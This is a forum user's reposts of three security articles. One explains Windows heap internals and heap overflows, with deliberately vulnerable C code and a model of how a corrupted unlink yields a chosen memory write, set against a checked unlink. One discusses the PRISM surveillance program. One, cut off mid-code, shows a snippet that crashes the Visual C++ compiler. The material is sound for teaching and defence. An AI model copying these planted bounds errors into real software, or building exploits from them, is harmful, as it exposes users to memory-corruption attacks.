Everything posted by Nytro

  1. [h=1]Heap Overflow: Vulnerability and Heap Internals Explained[/h]

ViperEye, June 26, 2013

1. Introduction

A heap overflow is a form of buffer overflow; it happens when a chunk of memory is allocated to the heap and data is written to this memory without any bound checking being done on the data. This can lead to overwriting some critical data structures in the heap such as the heap headers, or any heap-based data such as dynamic object pointers, which in turn can lead to overwriting the virtual function table. Here we’ll see some details about the inner working of the Windows heap, then move on to discuss how a heap overflow vulnerability occurs. The paper will start with basic information on how Windows heap management is done and then move to understanding the vulnerability.

2. Windows Heap Basics

Windows has two kinds of heap:
  • Default heap
  • Dynamic heap

The default heap is used by the win32 subsystem to manage and allocate memory for local and global variables and local memory management functions [malloc()]. The dynamic heap is created by functions such as HeapCreate() that return a handle/address to a memory chunk that contains the heap header; the information in this header includes the segment table, virtual allocation list, free list usage bitmap, free list table, lookaside table, etc. This data is used by heap allocation functions such as HeapAlloc() and HeapReAlloc(), which allocate memory from this particular heap.

As we can see from the above image, the PEB stores the details of the heaps initialized in the system. This can be useful in enumerating heaps in the system.

The above image shows the structure of the heap header. Next we will take a look at some of the important data structures in the heap that will help us understand the heap exploit better.
[Heap header layout, from the original figure: Segment List, Virtual Allocation List, Free List, Pointer to Lookaside List]

The condition where the heap is not used is when the allocation chunk is greater than 512KB (4096 bytes); in this case, the allocation is done in virtual memory by VirtualAlloc(). Let’s see how this happens:

The above image shows how the heap allocation is done; certain constraints are verified before passing it forward. As we can see, all the calculation is done based on dividing by 8, the size of the allocated block is always divisible by 8, and we can also conclude from the code that there cannot exist a block of size 8 bytes because the header itself will amount to 16 bytes. Here’s the decision path during the heap allocation process:

1. If the block size is greater than 1024 bytes, go to step 2. If it is less than 1024 bytes, check the lookaside list; if there are no free entries, check the free list.
2. If the above condition is true, then check whether the memory to be allocated is greater than 0xFE00 (512 KB).
3. If the above condition is not true, then the memory is allocated from the free list.
4. If the above condition is true, then check whether the heap was created with a fixed size; if true, then throw an error (STATUS_BUFFER_TOO_SMALL) 0xC0000023. If not true, use ntdll.ZwAllocateVirtualMemory to allocate new memory.

Now let’s look at how heap memory is freed; memory is freed based on whether it is in the default heap or the dynamically allocated heap.

If the buffer is in the default heap, then:
  • Try to free it to the lookaside list.
  • Or coalesce the buffer and place it on the free list.

If it is virtually allocated:
  • Remove it from the busy list.
  • Or free it to the OS.
Freeing a buffer to the lookaside happens only if:
  • There is a lookaside table
  • The lookaside is not locked
  • The requested size is smaller than 1024 (to fit the table)
  • The lookaside is not “full” yet

If the buffer can be placed on the lookaside, keep the buffer flags set to busy and return to the caller. The other option is to coalesce and place it in a free buffer. This happens only if the buffer can’t be freed to the lookaside. The conditions where coalesce fails:
  • Freed buffer flags & 0x80 is true
  • Freed buffer is first -> no backward coalesce
  • Freed buffer is last -> no forward coalesce
  • Adjacent buffer is busy
  • The total size of two adjacent buffers is bigger than the virtual allocate threshold (0xFE00 * 8 bytes == ~64k)

Insert to the free list if:
  • Coalesced block size < 1024: insert into the proper free list entry.
  • Coalesced block size > De-commit threshold and the total heap free size is over the De-commit total free threshold: De-commit the buffer back to the OS.
  • Coalesced block is smaller than the virtual allocate threshold: insert the block into free list [0].
  • Coalesced block is bigger than the virtual allocate threshold: break the buffer into smaller chunks, each one as big as possible, and place them on free list [0].

Heap Overflows

Let’s take a look at this rather simple example of a vulnerable function:

[CODE]
#include <windows.h>
#include <string.h>

HANDLE h = HeapCreate(0, 0, 0); // default flags

DWORD vulner(LPVOID str)
{
    LPVOID mem = HeapAlloc(h, 0, 128);
    // ...
    strcpy((char *)mem, (const char *)str); // no bound check on the length of str
    // ...
    return 0;
}
[/CODE]

As we can see, here the vulner() function copies data from a string pointed to by str to an allocated memory block pointed to by mem, without a bound check. A string larger than 127 bytes passed to it will thereby overwrite the data coincidental to this memory block (which is, actually, a header of the following memory block). The lookaside list has two pointers pointing to the lookaside entries before and after it, called the FLINK and BLINK pointers. The layout for a single lookaside entry is given below:

So, when an overflow occurs, we can overwrite the FLINK and BLINK pointers.
Now let’s modify the above code:

[CODE]
#include <windows.h>
#include <string.h>

DWORD vulner(LPVOID str)
{
    HANDLE h = HeapCreate(0, 0, 0);
    LPVOID m1 = HeapAlloc(h, 0, 64);
    LPVOID m2 = HeapAlloc(h, 0, 128);
    HeapFree(h, 0, m1);
    HeapFree(h, 0, m2);
    // The above steps place the buffers in the lookaside list
    m1 = HeapAlloc(h, 0, 64);
    // This sets up the memory for overwrite into adjacent memory blocks:
    // 64 + 16 bytes of 0x31 run past m1 into the header of the 128-byte chunk
    memset((char *)m1, 0x31, 64 + 16);
    m2 = HeapAlloc(h, 0, 128 - 8);
    // ...
    strcpy((char *)m2, (const char *)str);
    // ...
    return 0;
}
[/CODE]

From the above code we can see that we have allocated two memory chunks and then freed them to the lookaside list; as mentioned above, any memory below 1024-8 bytes will be sent to the lookaside list. After that, an allocation of 64 bytes is done again. This will move the memory back to the busy list. But, in this case, the memory of 128 bytes will still be right next to the 64-byte chunk, so if we overflow the 64-byte chunk the data will write into the 128-byte chunk. In the next line we are overwriting with 64+16 bytes of data, which will overwrite the header and the FLINK, BLINK pointers of the 128-byte block. This is shown in the image below:

The whole process of unlinking is shown below:

[CODE]
Entry2->BLINK->FLINK = Entry2->FLINK
Entry2->FLINK->BLINK = Entry2->BLINK
[/CODE]

So now, when the 128-byte buffer is allocated, it already has corrupted FLINK and BLINK pointers. These can be in an attacker’s control. So the entry “Entry2->BLINK->FLINK” will be in an attacker-controlled memory location; this can be overwritten with the value of Entry2->FLINK, which is also attacker-controlled.

Conclusion

This paper simply gives an understanding of the heap overflow process. The next article will give the details about how this vulnerability can be exploited.

Source: InfoSec Institute Resources – Heap Overflow: Vulnerability and Heap Internals Explained
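The unlink described in the article, modelled in plain C as an added example (not code from the article or from the Windows heap): the two unchecked FLINK/BLINK writes beside a checked variant that refuses an entry whose neighbours no longer point back at it, which is the consistency test later heap implementations perform before unlinking. The LIST_ENTRY fields, adjacent_chunks, replay() and the target/scratch entries are this example's own constructions.

```c
#include <stddef.h>
#include <string.h>

/* Doubly linked entry with the FLINK/BLINK pair the article describes. */
typedef struct list_entry {
    struct list_entry *flink;   /* forward link  */
    struct list_entry *blink;   /* backward link */
} LIST_ENTRY;

/* Adjacent chunks: 64-byte user area directly followed by the next chunk's entry. */
typedef struct {
    LIST_ENTRY hdr64;
    unsigned char data64[64];
    LIST_ENTRY hdr128;
} adjacent_chunks;
static void list_init(LIST_ENTRY *head) { head->flink = head->blink = head; }
static void list_insert_head(LIST_ENTRY *head, LIST_ENTRY *e) {
    e->flink = head->flink;
    e->blink = head;
    head->flink->blink = e;
    head->flink = e;
}
/* The two writes from the article, with no validation at all. */
static void unlink_unchecked(LIST_ENTRY *e) {
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
}

/* Checked variant: returns 0 (and writes nothing) unless both neighbours point back at e. */
static int unlink_safe(LIST_ENTRY *e) {
    if (e->flink->blink != e || e->blink->flink != e)
        return 0;
    unlink_unchecked(e);
    return 1;
}

typedef struct {
    int unlinked;            /* hdr128 was taken off the list */
    int target_overwritten;  /* an unrelated word was modified by the unlink */
} unlink_outcome;

/* Replays the article's scenario: both chunks sit on a free list, the 64-byte chunk
 * is reallocated and overflowed by 64 + sizeof(LIST_ENTRY) bytes so that hdr128 holds
 * chosen pointers, then hdr128 is unlinked. `target` stands for the memory the
 * corrupted BLINK points at. */
static unlink_outcome replay(int use_safe_unlink) {
    unlink_outcome out = {0, 0};
    LIST_ENTRY head, target, scratch, crafted;
    adjacent_chunks mem;
    unsigned char overflow[64 + sizeof(LIST_ENTRY)];   /* constructed input */

    memset(&mem, 0, sizeof mem);
    list_init(&head);
    list_init(&target);
    list_init(&scratch);
    list_insert_head(&head, &mem.hdr64);     /* HeapFree(m1) */
    list_insert_head(&head, &mem.hdr128);    /* HeapFree(m2) */
    unlink_unchecked(&mem.hdr64);            /* HeapAlloc(64): list still intact */

    /* 64 fill bytes, then a list entry that lands exactly on hdr128. */
    memset(overflow, 0x31, 64);
    crafted.flink = &scratch;   /* value the unlink writes through BLINK */
    crafted.blink = &target;    /* where that write lands: target.flink */
    memcpy(overflow + 64, &crafted, sizeof crafted);
    memcpy((unsigned char *)&mem + offsetof(adjacent_chunks, data64),
           overflow, sizeof overflow);       /* the unbounded copy */

    /* HeapAlloc(128): the allocator unlinks hdr128 via the corrupted pointers. */
    if (use_safe_unlink) {
        out.unlinked = unlink_safe(&mem.hdr128);
    } else {
        unlink_unchecked(&mem.hdr128);
        out.unlinked = 1;
    }
    out.target_overwritten = (target.flink == &scratch);
    return out;
}

/* 1 when the unchecked unlink wrote the chosen value to the chosen location. */
int demo_unchecked_unlink(void) {
    unlink_outcome o = replay(0);
    return o.unlinked && o.target_overwritten;
}

/* 1 when the checked unlink refused the corrupted entry and left target alone. */
int demo_safe_unlink(void) {
    unlink_outcome o = replay(1);
    return !o.unlinked && !o.target_overwritten;
}

/* 1 when the checked unlink still removes the middle entry of an intact list. */
int demo_safe_unlink_intact(void) {
    LIST_ENTRY head, a, b, c;
    list_init(&head);
    list_insert_head(&head, &a);
    list_insert_head(&head, &b);
    list_insert_head(&head, &c);             /* head -> c -> b -> a -> head */
    return unlink_safe(&b) && head.flink == &c && c.flink == &a && a.blink == &c;
}
```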
  2. [h=1]PRISM – Facts, Doubts, Laws and Loopholes[/h]

Pierluigi Paganini, June 24, 2013

[h=1]Introduction[/h]

Edward Snowden is the name of a 29-year-old technical assistant for the Central Intelligence Agency who disclosed the largest surveillance program implemented by the US, known as the PRISM program. For better or for worse, his name is destined to enter into history. The Guardian identified Edward Snowden as a technical assistant who worked for US Intelligence at the National Security Agency for the last four years for various defense contractors. Currently he is an employee of the security defense contractor Booz Allen Hamilton. Snowden decided to reveal his identity because, like other whistleblowers such as Bradley Manning, the US Army soldier who was arrested in May 2010 in Iraq on suspicion of having passed classified material to the website WikiLeaks, he decided to make public an uncomfortable truth. The disclosure started with the publication of the secret court order to Verizon Communications, but it was just the tip of the iceberg. All of the principal US IT companies support the surveillance program PRISM despite their top management denying it. The surveillance architecture monitors every activity on the Internet, and it has been ongoing for many years. Through it the US Government has obtained access to users’ data, and private companies like Microsoft, Google, Facebook and Apple are all involved. Edward Snowden feared that the government would persecute him for disclosing Top Secret documentation on the extensive massive surveillance program PRISM. While I’m writing this, he is in a hotel in Hong Kong, where he flew after the publication of the presentation he prepared during his work in the NSA Office in Hawaii, around three weeks ago. Snowden decided to publish the history and proof of a program that every US citizen imagined but that authorities and private companies always denied.
He left the US citing health reasons and flew to Hong Kong, the Chinese territory known also for its “strong tradition of free speech.” According to the interview released to The Guardian, Edward Snowden is concerned, as he knows very well the power of intelligence agencies and the ramifications of his actions. He has thus barricaded himself in a hotel. “I’ve left the room maybe a total of three times during my entire stay.” “I have no intention of hiding who I am, because I know I have done nothing wrong.” “I could be rendered by the C.I.A., I could have people come after me.” “We’ve got a C.I.A. station just up the road in the consulate here in Hong Kong, and I’m sure that they’re going to be very busy for the next week, and that’s a fear I’ll live under for the rest of my life,” Snowden said. The confirmation of the existence of a PRISM program has shocked public opinion. Associations for the defense of freedom of expression and human rights are concerned about the violation of the citizens’ privacy, even if it is for homeland security reasons. The Obama administration is defending the surveillance program, saying it is necessary to prevent terrorist plots, and that the debated data collection has already allowed the prevention of terrorist acts. “Nobody is listening to your telephone calls. That’s not what this program is about.” “In the abstract you can complain about Big Brother and how this is a potential program run amok, but when you actually look at the details, I think we’ve struck the right balance.” “You can’t have 100 percent security and also then have 100 percent privacy and zero inconvenience.” “We’re going to have to make some choices as a society. … There are trade-offs involved.” This is what the President told journalists during a visit to California’s Silicon Valley. Edward Snowden considers himself a patriot, having served his country as a soldier in Iraq and recently working as a contractor for the CIA overseas.
He declared that he has carefully considered his actions and their possible consequences for the population, but nothing could be worse than what he witnessed. He carefully evaluated the documents he disclosed to ensure no people would be harmed and that the public interest would be served. “Anybody in positions of access with the technical capabilities that I had could, you know, suck out secrets to pass them on the open market to Russia.” “I had access to the full rosters of everyone working at the NSA, the entire intelligence community and undercover assets all around the world — the locations of every station we have, what their missions are.” “If I had just wanted to harm the U.S., you could shut down the surveillance system in an afternoon.” President Obama is in the eye of the storm. He was syndicated by some members of Congress despite the revelation announced by The White House that the administration has played at least 13 briefings to Congress to show the surveillance program operated by the NSA.

[h=1]The Fact – The PRISM Program[/h]

The Washington Post and the Guardian were the first newspapers to publish the news of how the US machine for surveillance works. The NSA and FBI systematically access user information from central servers of the leading IT companies. The list revealed, despite the beliefs of many security experts, that the extension of the monitoring network is larger:
  • AOL
  • Apple
  • Dropbox
  • Facebook
  • Google
  • PalTalk
  • Skype
  • Yahoo
  • YouTube

The surveillance project began in 2007 and was supported by the Bush administration. It was known as PRISM and is capable of acquiring sensitive information from IT majors and then operating complex analysis activities. The Washington Post published an article on the PRISM program reporting the top secret documents disclosed in Snowden’s presentation. They revealed that PRISM has been referred to at least 1,477 times during government briefings on Homeland Security.
The document states that PRISM became popular during the Arab Spring when it was used to profile individuals considered dangerous for the US. The 41 slides composing the presentation, classified as Top Secret, claim that the “collection directly from the servers” of major US IT service providers remarks the need for the information for security purposes. The Guardian has verified the authenticity of the PowerPoint presentation that is circulating on the Internet. It is classified as top secret, with no distribution to foreign allies, and was apparently used to train operatives. “Information collected under this program is among the most important and valuable foreign intelligence information we collect, and is used to protect our nation from a wide variety of threats. The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans,” Director of National Intelligence James R. Clapper said. All the companies reported in the Top Secret document denied any knowledge of the secret program; here are the principal comments on the disclosure: “Google cares deeply about the security of our users’ data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a back door for the government to access private user data,” stated Google. “We do not provide any government organization with direct access to Facebook servers. When Facebook is asked for data or information about specific individuals, we carefully scrutinize any such request for compliance with all applicable laws, and provide information only to the extent required by law,” declared Joe Sullivan, Chief Security Officer for Facebook.
“We have never heard of PRISM. We do not provide any government agency with direct access to our servers, and any government agency requesting customer data must get a court order,” said Steve Dowling, a spokesman for Apple.

[h=1]Is the PRISM Program Legal? Law and Regulations[/h]

The digital exposure of Internet users has reached a level unthinkable until a few years ago. This aspect has had mainly positive effects but it has also increased the surface of attack for each individual. We are all exposed to serious privacy risks, especially as legislation has struggled to keep up. The number of laws that are trying to regulate our digital existence is increasing. There is a need to reduce the gaps in legislation and enforcement that open you up to online data breaches, stalking, identity theft and disclosure of users’ personal information. It must be considered that these laws can have a major impact on our life; every ordinary operation could be started with something simple such as a phone call. Analyzing the US legal model, we can recognize the different areas in which such laws are trying to regulate the introduction of technology; a short list follows:

[h=3]Digital Life[/h]

Laws and proposals designed to protect users’ privacy in the online and mobile spheres:
  • The Protecting Children from Internet Pornographers Act of 2011 was designed to increase the enforcement of laws related to child pornography and child sexual exploitation.
  • The Electronic Communications Privacy Act is almost 30 years old, so it is likely going to see some major revisions to reflect the increased variety and prevalence of electronic communications. The original act was designed to help expand federal wiretapping and electronic eavesdropping provisions, as well as to protect communications that occur via wire, oral, and electronic means and to balance the right to privacy of citizens with the needs of law enforcement.
  • The Children’s Online Privacy Protection Act or COPPA protects children under 13 from the online collection of personal information.
  • The GPS Act is a proposal to give government agencies, commercial entities, and private citizens specific guidelines for the use of geolocation information.

[h=3]Digital Commerce[/h]

The massive introduction of technology in commerce has required the definition of strict laws to avoid the abuse of information on consumer habits and activities. Following is a list of laws that seek to address a number of major issues related to consumer privacy rights:
  • The Commercial Privacy Bill of Rights establishes a baseline code of conduct for how personal information can be used, stored, and distributed.
  • The Application Privacy, Protection, and Security Act of 2013 was designed to address concerns with the data collection being done through applications on mobile devices and would require that app developers provide greater transparency about their data collection practices.
  • The Location Privacy Protection Act of 2011 addresses the risks for stalking posed by cell phones loaded with GPS and apps that gather information about a user’s location.
  • The Cyber Intelligence Sharing and Protection Act (CISPA) is designed to allow government investigation of cyber threats and sharing of Internet traffic information between the US government and IT and manufacturing companies.

[h=3]Work and Employment[/h]

Laws and regulations that affect users in the workplace during their ordinary activity:
  • The Social Media Privacy Act is for the protection of online privacy for job seekers.
  • The Genetic Information Nondiscrimination Act of 2008 prohibits the use of genetic information in health insurance and employment.

[h=3]Personal Information[/h]

No doubt, the most important set of laws and regulations are those that address issues of personal information, including medical data, private phone conversations, and video watching history.
  • The Foreign Intelligence Surveillance Act (FISA) Amendments Act of 2008 / FISA Amendments Act Reauthorization Act of 2012 passed in 1978 but has undergone some major restructuring in recent years. It prescribed basic procedures for physical and electronic surveillance and the collection of foreign intelligence information. It also provides strict judicial and congressional oversight of any covert surveillance activities. It has been modified several times; the first time under the Patriot Act expired in 2008. The U.S. Senate voted in December 2012 to extend the FISA Amendments Act through the end of 2017. Under this act, the US Government is authorized to conduct surveillance of Americans’ international communications, including phone calls, emails, and Internet records, exactly what is addressed by the PRISM program. These orders do not need to specify who is being spied on or the reasons for doing so. It is now possible for government agencies to collect information on any foreign communications, which many individuals and privacy protection groups have consistently argued is a gross violation of privacy and civil liberties.
  • The Health Information Technology for Economic and Clinical Health (HITECH) Act requires that major security breaches be reported to Health and Human Services as well as the media. It increases enforcement of HIPAA and the resulting penalties and ensures that any individual can request a copy of his or her public health record. Most importantly, it expands HIPAA regulations to include any business associates or providers to medical facilities, requiring vendors of any kind to keep private records private.
  • The Video Privacy Protection Act was designed to prevent the disclosure of audio/video materials; with respect to the original proposal, it has been integrated with social media sites.
  • The Protect Our Health Privacy Act of 2012 requires health providers to encrypt any mobile device containing health information, restrict business associates’ use of protected health information, improve congressional oversight of HIPAA, and provide additional measures that would protect patient privacy and safety when using health information technology.

[h=3]Back to the PRISM Case[/h]

After the analysis of the principal laws and proposals, users can have a clearer idea of what governments are allowed to do to ensure homeland security. The US PRISM program seems to be allowed by “Section 215 of the Patriot Act, which authorizes the existence of special procedures, authorized by the FISA court to force U.S. companies to deliver assets and records of their customers, from the metadata to confidential communications, including e-mail, chat, voice and video, videos and photos”. It expands the law enforcement power to spy on every US citizen, including permanent residents, without providing explanation, starting the investigation on the exercise of First Amendment rights. Those who are the subjects of the surveillance are never notified of ongoing activities. Law enforcement could keep track of every activity made by a suspect, including communication and Internet activities. Many citizens and lawyers can consider Section 215 unconstitutional, claiming that it violates the Fourth Amendment by allowing the government to effect Fourth Amendment searches without a warrant and without showing probable cause. Section 215 might be used to obtain information that affects privacy interests other than those protected by the First Amendment; let’s think of medical records. Also the Fourth and Fifth Amendments are violated by the provision of such data, by failing to require that those who are the subject of Section 215 orders be told that their privacy has been compromised.
[h=1]The Outsourcing of Intelligence: Risks and Benefits[/h]

The recent data leak on the US Top Secret program PRISM by an intelligence contractor raised a debated discussion on the introduction of outsourcing for personnel to hire for top-secret programs. It was an inevitable consequence of the growth of the security sector and of the increased number of tasks needed by governments to ensure homeland security and the security of principal productive sectors. Edward Snowden has worked at Booz Allen Hamilton and other intelligence contractors. His career started at the Central Intelligence Agency with various technical assignments. In an official statement, the company Booz Allen declared, “Booz Allen can confirm that Edward Snowden, 29, was an employee of our firm for less than 3 months, assigned to a team in Hawaii. Snowden, who had a salary at the rate of $122,000, was terminated June 10, 2013 for violations of the firm’s code of ethics and firm policy. News reports that this individual has claimed to have leaked classified information are shocking, and if accurate, this action represents a grave violation of the code of conduct and core values of our firm. We will work closely with our clients and authorities in their investigation of this matter.” Snowden is one of the thousands of private intelligence contractors hired by the US Government to respond to the increased necessity of security to prevent terrorist attacks. The majority of these professionals play critical roles within the principal security agencies in the country. They access confidential information, gather sensitive data on intelligence missions, and work side by side with civil government analysts in accessing a huge quantity of secret and top-secret documents.
According to the official reveal of the Office of the Director of National Intelligence, almost one in four intelligence workers were employed by contractors, and around 70% of the intelligence community’s secret budget is spent on outsourcing. The outsourcing of intelligence activities allows better rationalization of the funds designated to ensure homeland security, but it also represents a serious risk for the possibility of infiltration of spies and whistleblowers. The AP reported that nearly 500,000 contractors have access to the government’s top secret programs. “Of the 4.9 million people with clearance to access “confidential and secret” government information, 1.1 million, or 21 percent, work for outside contractors, according to a report from Clapper’s office. Of the 1.4 million who have the higher “top secret” access, 483,000, or 34 percent, work for contractors.” In 2007, the former director of Naval Intelligence, retired Rear Adm. Thomas A. Brooks, wrote in a report that contractors assumed a crucial role within the nation’s intelligence infrastructure. “The extensive use of contractor personnel to augment military intelligence operations is now an established fact of life …. It is apparent that contractors are a permanent part of the intelligence landscape,” he said. To give an idea of the number of private contractors that worked for US intelligence agencies, The Post reported that 1,931 private companies worked on reserved counterterrorism operations and many other campaigns to empower homeland. The operations were conducted all over the country in around 10,000 locations. During the last year, the principal emergency was related to the increased number of cyber attacks, both sabotage and cyber espionage campaigns, against national networks.
The massive introduction of technology has made necessary the recruitment of a large number of technicians who have been entrusted with the delicate task of protecting the country’s infrastructure such as communication networks, grids, and satellite systems. A recent trend that emerged to respond to continuous cyber attacks is the involvement in offensive operations of skilled professionals and hackers hired to instruct cyber units. These same hackers have been used to perform vulnerability assessments and penetration testing on critical infrastructures.

[h=1]The Risk of Cyber Attacks on the US Massive Surveillance System[/h]

One of the most alarming risks related to a Top Secret program such as PRISM is represented by the possible disclosure of the information gathered. Unauthorized access to the information could give a foreign government a meaningful advantage in terms of intelligence. Foreign hackers could have access to a huge quantity of sensitive information centralized and concentrated in a single vulnerable architecture. It must be considered that a possible attack could be taken advantage of by insiders and cyber spies. The case of Bradley Manning proved to public opinion the devastating effect that the revelation of the government’s secret documents could have on homeland security. Starting with the consideration that nearly 854,000 people ordinarily manage top-secret security clearances, it is to understand the surface of attacks for the “machine” of Intelligence. Each of these individuals could be a target for state-sponsored hackers and could also represent an insider threat. The disclosure of the PRISM program is a demonstration that the principal US intelligence agencies and law enforcement weren’t able to protect Top Secret information from disclosure.
The information has been acquired by a journalist thanks to a spontaneous revelation, but it must be considered that many other Top Secret programs could be affected by cyber espionage operations by foreign governments. “The access to PRISM information could enable blackmail on a massive scale, widespread manipulation of U.S. politics, and industrial espionage against American businesses.” If persistent collectors such as the Chinese government or a hostile country like Iran or North Korea could have access to a surveillance system, it could be a tragedy for the country. Suddenly the country would have no secrets from the adversary, and every sector would be deeply impacted. Foreign governments aren’t unique in their interest in access to the surveillance system. Terrorists belonging to groups like Al Qaeda and also cyber criminals could breach the defense of Intelligence archives. The development and deployment of a massive surveillance system is a critical choice. The government in fact must be sure to be able to prevent foreign intrusions and to avoid the creation of a possible single point of failure for the overall security of the country.

[h=1]Countermeasures[/h]

There are various ways to limit the exposure of our digital experience to surveillance and monitoring activities. The US Government and law enforcement could have access to email accounts such as Gmail messages, spy on user communication and discover their habits. Following are a few simple suggestions to avoid monitoring:

[h=3]How to anonymize the user’s Internet experience?[/h]

Tor Network

On the Internet, every machine is identified by its IP address, which could be hidden by using anonymizing services and networks such as I2P and the Tor network. Usually, the anonymizing process is based on the concept of distribution of routing information. Tor software and the Tor open network help users to avoid surveillance during web browsing, hiding the IP address and other identifying information if properly configured.
The anonymity is granted through the bouncing of traffic among randomly routed proxy computers before sending it on to its real destination and through message encryption. Every node of the network manages minimal information to route the packets to the next hop without conserving history on the path. Tor is easy to use. You can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing.

Web Proxy

To anonymize a user’s identity and IP address, it is possible to use anonymizing services. The simplest way to do it is through Web-based proxies like Proxify or Hide My Ass. Web proxies are easy to use; just by typing a website URL the user could visit it anonymously. Many of them also implement advanced features to encrypt connections or block cookies and JavaScript. The principal drawback is related to data speed and difficulty in accessing some contents like videos. Of course, be aware of the proxy you use, as you could come across honeypots set up to spy on you.

VPN

Virtual Private Networks represent a valid solution to anonymously surf the Internet. Premium VPNs’ paid services dedicate proxy servers for their customers. All client traffic is tunneled to the VPN server via this encrypted connection and from there to the web. This results in actually using the server’s IP to browse the web, instead of the client’s. The principal question is related to the attitude of some VPN providers to maintain server logs that could reveal users’ habits. Of course the principal service providers deny it, but it is a concrete risk. All the above solutions slow down surfing speed due to the application of tunneling processes and the implementation of cryptographic algorithms.

[h=3]Keep your chat conversations private[/h]

For every communication channel, there is a more or less secure solution.
The events demonstrated that the most popular conventional instant messaging services, like those offered by Google, Yahoo or Microsoft, keep track of your conversations. A typical solution to protect the content of chat communications is to encrypt the messages end to end, an operation that can be done using a self-made chat client that enciphers the content to transmit, or by choosing a chat extension available on the Internet. A very popular cryptographic protocol that provides strong encryption for instant messaging conversations is OTR (“off the record”). It uses a combination of the AES symmetric-key algorithm, the Diffie–Hellman key exchange, and the SHA-1 hash function to protect user privacy. Using the protocol, the server only sees the encrypted conversations, thwarting eavesdropping. Of course, to use OTR, both interlocutors must install instant messaging software that supports it, such as Pidgin for Windows and Linux systems.

[h=3]Keep private your calls[/h]
Telephone conversations are exposed to government monitoring, and PRISM is just the latest demonstration of the control exercised by authorities for security reasons. For some years now, users have been convinced that Internet-based telephony applications represented the most secure way to make calls and avoid wiretapping. Skype was considered the most secure channel since its acquisition by Microsoft. Of course, I’m speaking of commercial products, avoiding express reference to the various crypto-mobiles and applications commercialized at high cost by many security firms. Today one of the most interesting solutions provided on the market is Silent Circle. It implements “end-to-end” encryption, making it impossible for telephone companies to access the user’s calls.
As reported by the Washington Post: “The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn’t contain any “back doors.”” Another interesting piece of software with similar functionality that has been independently audited to make sure there are no back doors is RedPhone, an application that protects phone calls with end-to-end encryption. It has been developed with financial support from U.S. taxpayers courtesy of the Open Technology Fund.

[h=3]Protecting emails[/h]
Another critical aspect is the protection of users’ mail. Commercial PGP or free GPG are considered the standard for email security, and both can be used to encrypt and decrypt messages, avoiding surveillance. GNU Privacy Guard (GnuPG or GPG) is a GPL-licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, which is the current IETF standards track specification of OpenPGP. Current versions of PGP (and Veridis’ Filecrypt) are interoperable with GnuPG and other OpenPGP-compliant systems. The main problem with GPG is that novice users could find it complicated to use and not portable. I can promise that in the next few weeks, a product designed by me and my staff that makes the use of GPG on multiple platforms very easy will become available. The solution I designed is very strong and impossible to hack, and it also hides many other surprising features.

[h=1]Conclusions[/h]
The existence of the PRISM program doesn’t surprise security experts or the common people. According to a recent survey, the majority is willing to sacrifice their privacy for homeland security. In the PRISM story, I personally found concerning the approach of the principal IT companies, which had professed a totally different respect for privacy. My last thought is for surveillance operations elsewhere on the planet, which are often synonymous with censorship and persecution.
The laws and regulations of many countries accept these practices to protect the interests of the oligarchy that governs the state. What will happen now that we know that the machines spying on us are also equipped with artificial intelligence and can take action against human beings?

[h=1]References[/h]
Edward Snowden is responsible for the disclosure of the PRISM program
Edward Snowden: the whistleblower behind the NSA surveillance revelations | World news | The Guardian
NSA slides explain the PRISM data-collection program - The Washington Post
NSA Prism program taps in to user data of Apple, Google and others | World news | The Guardian
The outsourcing of U.S. intelligence raises risks among the benefits - The Washington Post
http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html
InfoSec Institute Resources – Introduction to Anonymizing Networks – Tor vs I2P
NSA Leak Highlights Key Role Of Private Contractors
The Legislation of Privacy: New Laws That Will Change Your Life - BackgroundCheck.org
Five ways to stop the NSA from spying on you

Source: InfoSec Institute Resources – PRISM – Facts, Doubts, Laws and Loopholes
  3. [h=2]Crashing the Visual C++ compiler[/h]In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the likings of Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this). [h=2]Heads up![/h]If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article: Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the [URL="http://technet.microsoft.com/library/cc184906.aspx"]TechNet Article Security Guidance[/URL]. 
In other words (keep in mind I'm not a build service expert, but this is how I understand it):

Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server. It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server.

You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers' machines, etc.

To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges.

[h=2]The code that crashes[/h]
The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future):

#include <stdio.h>

class A { public: int alot[1024]; };
class B : public A { public: int more[1024]; };
class C : public A { public: int more[1024]; };
class DA : public B,C { public: int much[1024]; };
class DB : public B,C { public: int much[1024]; };

#define X(a) \
  class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \
  class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; }

#define Y(a) \
  X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \
